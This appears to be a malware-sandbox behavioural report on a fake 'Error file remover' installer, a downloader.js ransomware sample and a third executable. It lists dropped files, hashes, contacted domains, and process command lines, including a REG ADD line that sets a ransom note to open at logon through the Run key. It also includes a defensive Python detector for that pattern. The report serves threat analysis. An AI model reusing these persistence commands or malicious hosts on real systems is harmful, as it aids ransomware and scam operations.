Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Windows\Error file remover\Windows Logoff Sound.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\f7879a3.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7B19.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7D5D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\sys.job C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\f7879a3.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7879a6.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI88F5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7DCB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7E88.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7879a6.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI88E5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8A50.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8C45.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8DEC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7C42.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7CB1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8935.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI8974.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2060 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe C:\Windows\SysWOW64\msiexec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2428 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2528 wrote to memory of 2636 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2952 wrote to memory of 1436 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
PID 2952 wrote to memory of 1436 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
PID 2952 wrote to memory of 1436 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
PID 2952 wrote to memory of 1436 N/A C:\Windows\system32\taskeng.exe C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe

"C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 85C124E974A4815FD74652CF1F5EB6B7

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D0DF24FCC7D9A7DE0396A15905B2F351 M Global\MSI0000

C:\Windows\system32\taskeng.exe

taskeng.exe {EDB707B6-9464-4A86-957E-8042D78A2628} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]

C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe

"C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x518

Network

Country Destination Domain Proto
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.214.180.211:80 collect.installeranalytics.com tcp
US 8.8.8.8:53 recoverpcerror.com udp
US 8.8.8.8:53 itsupport24by7.com udp

Files

\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dll

MD5 3531cf7755b16d38d5e9e3c43280e7d2
SHA1 19981b17ae35b6e9a0007551e69d3e50aa1afffe
SHA256 76133e832c15aa5cbc49fb3ba09e0b8dd467c307688be2c9e85e79d3bf62c089
SHA512 7b053ba2cf92ef2431b98b2a06bd56340dad94de36d11e326a80cd61b9acb378ac644ac407cf970f4ef8333b8d3fb4ff40b18bb41ec5aee49d79a6a2adcf28fd

C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi

MD5 27bc9540828c59e1ca1997cf04f6c467
SHA1 bfa6d1ce9d4df8beba2bedf59f86a698de0215f3
SHA256 05c18698c3dc3b2709afd3355ad5b91a60b2121a52e5fcc474e4e47fb8e95e2a
SHA512 a3ae822116cddb52d859de7ffc958541bb47c355a835c5129aade9cc0e5fba3ff25387061deb5b55b5694a535f09fe8669485282eb6e7c818cc7092eb3392848

C:\Windows\Installer\MSI7B19.tmp

MD5 d552dd4108b5665d306b4a8bd6083dde
SHA1 dae55ccba7adb6690b27fa9623eeeed7a57f8da1
SHA256 a0367875b68b1699d2647a748278ebce64d5be633598580977aa126a81cf57c5
SHA512 e5545a97014b5952e15bb321135f65c0e24414f8dd606fe454fd2d048d3f769b9318df7cfb2a6bf932eb2bf6d79811b93cb2008115deb0f0fa9db07f32a70969

C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\{508A7E40-70C6-4BA4-B6A2-368AA3DBCC36}.session

MD5 5c58ea5b80d8472bd7eacc63bbea861a
SHA1 9add817c0e59f3ea96f7a08336d9d223b218d98c
SHA256 013cef8fe16201e72f55fa503a98a6abd36f53e188d3e05536e6330a7a95d09d
SHA512 0b34fb75a9e50a3bfbeaa0c9db30f871dad98ef6325eefd782b266cfdd8396f37bec35e551a3604fe01d571a789f6810795da2fb661bc7020bb7b287b30aac41

C:\Windows\Installer\MSI7CB1.tmp

MD5 4083cb0f45a747d8e8ab0d3e060616f2
SHA1 dcec8efa7a15fa432af2ea0445c4b346fef2a4d6
SHA256 252b7423b01ff81aea6fe7b40de91abf49f515e9c0c7b95aa982756889f8ac1a
SHA512 26f8949cad02334f9942fda8509579303b81b11bc052a962c5c31a7c6c54a1c96957f30ee241c2206d496d2c519d750d7f6a12b52afdb282fa706f9fee385133

C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini

MD5 7ab1355b8ae96751a8e6f3d6c953cd34
SHA1 90e3fcb6fb0cc25cbfc602f8d9920adaa9986802
SHA256 abd27abe6af73b4e33b98f706250163f2fdbeaea452e900d108da5afb3283936
SHA512 af35de60b0e2cdfa8809aefd152918e549fc0ed2e5c672a0fff1811abff1ca6b837179c1fac73361b15f55f1f7b36709d61c89fe07848f5bb8a48d04d6ed9aac

C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini

MD5 a93f81025eb9327246712b7d13ae0ece
SHA1 791c3f4441b5a62b815d63d205c1c552690dbbe6
SHA256 36f63277652d93a37a8fe93bc4a3533590ba92ca08eec97408ceac27978f3009
SHA512 2cef3c4c26c6dad4064c62d11835a9fd6c202649608c66ad535276c25a6faa550235385f3e817785768977c9f4bb6e8747c371980a6262553f9f7d79c47581aa

C:\Windows\Installer\MSI88F5.tmp

MD5 3cab78d0dc84883be2335788d387601e
SHA1 14745df9595f190008c7e5c190660361f998d824
SHA256 604e79fe970c5ed044517a9a35e4690ea6f7d959d21173ebef45cdd3d3a22bdd
SHA512 df6b49f2b5cddebd7e23e81b0f89e4883fc12d95735a9b3f84d2f402f4996c54b5fdea8adb9eaa98e8c973b089656d18d6b322bd71cb42d7807f7fa8a7348820

C:\Windows\Installer\MSI8935.tmp

MD5 7e6b88f7bb59ec4573711255f60656b5
SHA1 5e7a159825a2d2cb263a161e247e9db93454d4f6
SHA256 59ff5bc12b155cc2e666bd8bc34195c3750eb742542374fc5e53fb22d11e862f
SHA512 294a379c99403f928d476e04668717cdabc7dc3e33bcf6bcad5c3d93d4268971811ff7303aa5b4b2ed2b59d59c8eba350a9a30888d4b5b3064708521ac21439c

C:\Windows\Installer\MSI8974.tmp

MD5 aa82345a8f360804ea1d8d935f0377aa
SHA1 c09cf3b1666d9192fa524c801bb2e3542c0840e2
SHA256 9c155d4214cebda186647c035ada552963dcac8f88a6b38a23ea34f9ecd1d437
SHA512 c051a381d87ba933ea7929c899fb01af2207cb2462dcb2b55c28cff65596b27bdb05a48207624eeea40fddb85003133ad7af09ca93cfb2426c155daea5a9a6db

C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exe

MD5 e579c5b3c386262e3dd4150eb2b13898
SHA1 5ab7b37956511ea618bf8552abc88f8e652827d3
SHA256 e9573a3041e5a45ed8133576d199eb8d12f8922bbe47d194fef9ac166a96b9e2
SHA512 9cf947bad87a701f0e0ad970681767e64b7588089cd9064c72bf24ba6ca0a922988f95b141b29a68ae0e0097f03a66d9b25b9d52197ff71f6e369cde0438e0bb

C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Windows Logoff Sound.wav

MD5 bab1293f4cf987216af8051acddaf97f
SHA1 00abe5cfb050b4276c3dd2426e883cd9e1cde683
SHA256 bc26b1b97eeb45995bbd5f854db19f994cce1bb9ac9fb625eb207302dccdf344
SHA512 3b44371756f069be4f70113a09761a855d80e96c23c8cd76d0c19a43e93d1a159af079ba5189b88b5ee2c093099a02b00ea4dc20a498c9c0c2df7dc95e5ddd49

C:\Config.Msi\f7879a7.rbs

MD5 0f35c0f15e91bf2533656b0129fff225
SHA1 19dd9cfae6a1166a655d913aceee9bcbfd35991a
SHA256 7035ce433cd48a51a30c9599a65bfc4f86b94d37ddb1f3da5fd769976e111493
SHA512 57a41522b513cbe8f73738df977664744d3f71d2783eab03881b031c70b741a70271e3087e06d320c9215a7c338e006583003773f86feea2cff18f0a0fa90ffa

C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini

MD5 68ff1ccfea788678e926d7d48f990cb8
SHA1 9748174737bf2759ce864ceb0a888be971ab22f6
SHA256 ae8e2145e52732ef616bb81433171b9a7a5633eb1017cb3687a72f3e35c6699d
SHA512 9db7b35e28cc343c693ca92671680cad584ed30d540e02fe2a7259ea6950024a856dfa6b9289f6ef5b1f0b51b81236507c03846382be50b1a7d025e154e1d988

memory/1436-285-0x0000000003790000-0x00000000047F2000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20241010-en

Max time kernel

287s

Max time network

319s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\downloader.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1736 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1736 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\downloader.js

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\360390_tree.cmd" "

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Admin\AppData\Local\Temp\360390_readme.txt

C:\Windows\system32\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WinHelp" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\360390_readme.txt"
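The behavioral12 process list above is a compact detection surface: wscript.exe runs downloader.js, spawns cmd.exe for the dropped 360390_tree.cmd, notepad.exe displays 360390_readme.txt, and reg.exe registers that same .txt under HKCU\...\CurrentVersion\Run as "WinHelp". The Run value does not start a payload; it re-opens the note in the associated editor at each logon. The Python below is an added example written for this report, not sandbox output. It rebuilds the tree from process-creation events, parses the REG ADD command line, flags a Run value whose data is not an executable, and correlates it with the notepad launch. PIDs 1736 and 2896 are the report's; the PIDs of notepad.exe and reg.exe and the parent of wscript.exe are made up.

```python
import ntpath
import re

# Process-creation events modelled on the behavioral12 process list.
# PIDs 1736 (wscript.exe) and 2896 (cmd.exe) are the report's; the PIDs for
# notepad.exe and reg.exe and wscript's parent are made up (constructed data).
SAMPLE_EVENTS = [
    {"pid": 1736, "ppid": 1200, "image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\downloader.js"},
    {"pid": 2896, "ppid": 1736, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\360390_tree.cmd" "'},
    {"pid": 3012, "ppid": 2896, "image": r"C:\Windows\system32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\Admin\AppData\Local\Temp\360390_readme.txt"},
    {"pid": 3044, "ppid": 2896, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WinHelp" '
                r'/t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\360390_readme.txt"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Per-user and per-machine Run/RunOnce keys, whatever hive prefix the command used.
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?$", re.I)
EXEC_EXTS = {".exe", ".com", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".dll", ".lnk"}


def tokenize(cmdline):
    """Windows-style split: quoted runs stay together and the quotes are dropped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_reg_add(cmdline):
    """Return (key, value_name, data) for a `reg add` command line, else None."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or ntpath.basename(toks[0]).lower() not in ("reg", "reg.exe"):
        return None
    if toks[1].lower() != "add":
        return None
    opts, i = {}, 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag in ("/v", "/t", "/d") and i + 1 < len(toks):
            opts[flag] = toks[i + 1]
            i += 2
        else:                       # /f, /ve, /reg:32 ... carry no argument
            i += 1
    return toks[2], opts.get("/v"), opts.get("/d")


def analyze(events):
    """Return [(finding, detail), ...] for one batch of process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    findings, autostart_targets = [], set()

    # Pass 1: interpreter -> shell lineage, and Run-key writes made through reg.exe.
    for e in events:
        parent = by_pid.get(e["ppid"])
        image = ntpath.basename(e["image"]).lower()
        if parent and ntpath.basename(parent["image"]).lower() in SCRIPT_HOSTS and image in SHELLS:
            findings.append(("script_host_spawns_shell", e["cmdline"]))
        parsed = parse_reg_add(e["cmdline"])
        if parsed and parsed[2] and RUN_KEY_RE.search(parsed[0]):
            _, name, data = parsed
            ext = ntpath.splitext(data)[1].lower()
            kind = "run_key_executable" if ext in EXEC_EXTS else "run_key_non_executable"
            findings.append((kind, f"{name} = {data}"))
            autostart_targets.add(data.lower())

    # Pass 2: a document shown in notepad that is also registered to autostart is
    # the ransom-note pattern: the note is re-displayed at every logon.
    for e in events:
        if ntpath.basename(e["image"]).lower() == "notepad.exe":
            toks = tokenize(e["cmdline"])
            if len(toks) > 1 and toks[-1].lower() in autostart_targets:
                findings.append(("ransom_note_autostart", toks[-1]))
    return findings


if __name__ == "__main__":
    for finding, detail in analyze(SAMPLE_EVENTS):
        print(f"{finding:28} {detail}")
```

Feed it Sysmon event 1 or equivalent EDR process records with pid, ppid, image and cmdline fields; the three findings together (script host spawning a shell, Run value pointing at a document, that document opened in notepad) are far more specific than any one of them alone.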

Network

Country Destination Domain Proto
US 8.8.8.8:53 locksmithspringfield.us udp
US 3.33.130.190:80 locksmithspringfield.us tcp
US 8.8.8.8:53 thecottagespsychotherapycenter.com udp
US 8.8.8.8:53 kashfianlaw.com udp
US 104.16.108.239:80 kashfianlaw.com tcp
US 8.8.8.8:53 www.kashfianlaw.com udp
US 104.16.109.239:443 www.kashfianlaw.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.219.240.231:80 www.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\360390_tree.cmd

MD5 d96f59d97099a6248989e828d766dd5b
SHA1 9322d296171970ce8a280a4c562f41b5f3689de0
SHA256 e534769d416412d6ea8e91faf108bd8f52838e854145eab052483c37b4add1e3
SHA512 562c52a4dab31d9fc8983823561d181ddd0d0999baf3cbe8841afd3919ae020df573f41bd58fe6ecd090d47a1a1d2bad6abd68955e329cd541974c12d4ceca8c

C:\Users\Admin\AppData\Local\Temp\360390_readme.txt

MD5 f6a2bb17bf99a4dab08f75504bf270b3
SHA1 d42b9acaa08e19e1708e0e00a7961b8dd3219102
SHA256 34d5153eb38ee664fc03fcb7de7a75a76c1162fa83110d34e6b64c29424ed6ed
SHA512 037a713b6e8580adf6773992b29b75dcae8d0284dee228deddb41149d89aafefc9d8bf4374d8437d57f6a26afede42accb629988b5cd234430f53f5df2da0a96

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:19

Platform

win7-20240708-en

Max time kernel

570s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e6c4ae470977aa78d1005746ae05deea0bf3b4260f88865662a35f99b2559dbc_not_packed_maybe_useless.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e6c4ae470977aa78d1005746ae05deea0bf3b4260f88865662a35f99b2559dbc_not_packed_maybe_useless.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e6c4ae470977aa78d1005746ae05deea0bf3b4260f88865662a35f99b2559dbc_not_packed_maybe_useless.exe

"C:\Users\Admin\AppData\Local\Temp\e6c4ae470977aa78d1005746ae05deea0bf3b4260f88865662a35f99b2559dbc_not_packed_maybe_useless.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 police-center.in udp

Files

C:\ProgramData\fjpnrwuutgmtath

